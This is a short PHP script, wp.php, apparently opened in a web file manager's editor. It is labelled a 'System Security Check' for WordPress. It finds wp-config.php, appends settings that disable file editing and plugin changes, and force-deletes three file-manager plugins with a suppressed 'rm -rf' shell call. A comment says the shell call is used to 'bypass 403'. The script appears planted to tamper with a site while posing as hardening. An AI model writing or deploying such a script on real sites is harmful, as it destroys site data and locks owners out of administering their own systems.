관리-도구

편집 파일: wp.php

<?php
echo "<h3>🛠️ System Security Check</h3>";

$file = find_config();
if (!$file) exit("❌ wp-config.php tidak ditemukan!");

echo "📍 Target: <code>$file</code> ";

harden_config($file);
clean_plugins(dirname($file));

function find_config() {
    $dir = __DIR__;
    while ($dir !== dirname($dir)) {
        if (file_exists("$dir/wp-config.php")) return "$dir/wp-config.php";
        $dir = dirname($dir);
    }
    return false;
}

function harden_config($path) {
 $data = @file_get_contents($path);
 if (!$data) { echo "❌ Gagal baca file! "; return; }

$rules = ["DISALLOW_FILE_EDIT", "DISALLOW_FILE_MODS"];
    $count = 0;

foreach ($rules as $r) {
        if (strpos($data, $r) === false) {
            $data .= "\ndefine('$r', true);";
            $count++;
        }
    }

if ($count > 0) {
 $res = @file_put_contents($path, $data);
 echo $res ? "✅ Hardening: DONE ($count added) " : "❌ Hardening: FAILED (Permission?) ";
 } else {
 echo "ℹ️ Status: Already Hardened ";
 }
}

function clean_plugins($root) {
    $p_dir = "$root/wp-content/plugins";
    $list = ['wp-file-manager', 'wpspy', 'file-manager-advanced'];

foreach ($list as $p) {
 $target = "$p_dir/$p";
 if (is_dir($target)) {
 // Gunakan system delete agar lebih cepat & bypass 403
 @shell_exec("rm -rf " . escapeshellarg($target));
 echo (is_dir($target)) ? "❌ Gagal hapus: $p " : "🗑️ Plugin: $p DONE ";
 }
 }
}
?>